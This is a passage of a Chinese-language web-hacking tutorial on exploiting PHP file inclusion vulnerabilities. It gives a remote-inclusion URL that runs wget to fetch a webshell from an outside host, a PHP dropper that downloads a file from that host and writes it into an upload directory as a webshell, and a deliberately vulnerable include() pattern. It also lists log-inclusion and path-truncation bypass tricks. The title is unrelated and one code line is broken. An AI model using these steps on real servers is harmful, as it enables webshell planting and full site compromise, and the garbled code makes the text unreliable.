js查找字符串中的字符 PHP文件包含详细讲述(3)

1)使用wget之类的命令来下载一个Webshell

这个比较简单，也很常用，在上面我们得到的那个伪webshell中，我们可以执行命令，那么我们也可以调用系统中的一个很厉害的角色，wget， 这个命令的强大你可以google下，参数一大堆，绝对搞晕你，呵呵，我们不需要那么复杂，我们就使用一个 -O（–output- document=FILE，把文档写到FILE文件中） 就可以了，呵呵。

前提是你在按照前面的步骤放一个包含PHP代码的Webshell在一个可以通过HTTP或者FTP等可以访问的地方，比 如：,这个文件里写的就是Webshell的内容。然后我们在前面得到的伪 Webshell中 执行如下的URL：

?page=http://www.xxx.cn /cmd.txt?cmd=wget -O m4r10.php

如果当前目录可写，就能得到 一个叫做m4r10.php的Webshell了，如果当前目录不可写，还需要想其它的办法。

2）使用文件来创建

前面的wget可能会遇到当前目录不能写的情况；或者目标主机禁用了（或者没装）这个命令，我们又需要变通一下了，我们可以结合前面的包含文件漏洞来包含一个创建文件（写文件）的PHP脚本，内容如下：

<?php
$f=file_get_contents(“http://www.xxx.cn/m4r10.txt”); //打开指定路径的文件流
$ff=fopen(“./upload/m4r10.php”,”a”); 　　　　//寻找一个可以的目录，创建一个文件
fwrite ($ff,$f); 　//把前面打开的文件流写到创建的文件里
fclose($ff); 　　　//关闭保存文件
?>

还是写入我们上面用wget下载的那个php文件，但是我们改进了方法，用PHP脚本来实现，可以使用上面的cmd.php?cmd=ll查找可以 写的目录，比如这里的upload，然后把文件创建在这个目录下：./upload/m4r10.php。然后就得到我们的Webshell了。

4.本地文件包含（常用）

典型的漏洞代码：

<?php
include($_GET[pages].‘.php’);
?>

黑盒判断方法：

单纯的从URL判断的话，URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。

本地包含漏洞的利用（这里先忽略截断问题，下面会将截断的方法）

1、包含同服务器中上传的jpg、txt、rar等文件，这个是最理想的情况了。

2、包含系统的各种日志，如apache日志，文件系统日志等 其中apache当记录格式为combined，一般日志都会很大，基本无法包含成功。包含log是有自动化攻击程序的。

突破限制截断后面的字符串技巧

利用本地包含时常常需要用%00来截断后面的字符串，但在GPC为ON时%00是会被转义的，那么还有其他方法么？

用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串（推测相对路径可用）

看漏洞代码：

<?php
$webpath = dirname(__FILE__)."/";
$filepath = "test.txt";
for($i =1;$i<1000;$i++){
$filepath .= .;
}
include  $webpath.$filepath.".php";
?>

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/ruanjian/article-73731-3.html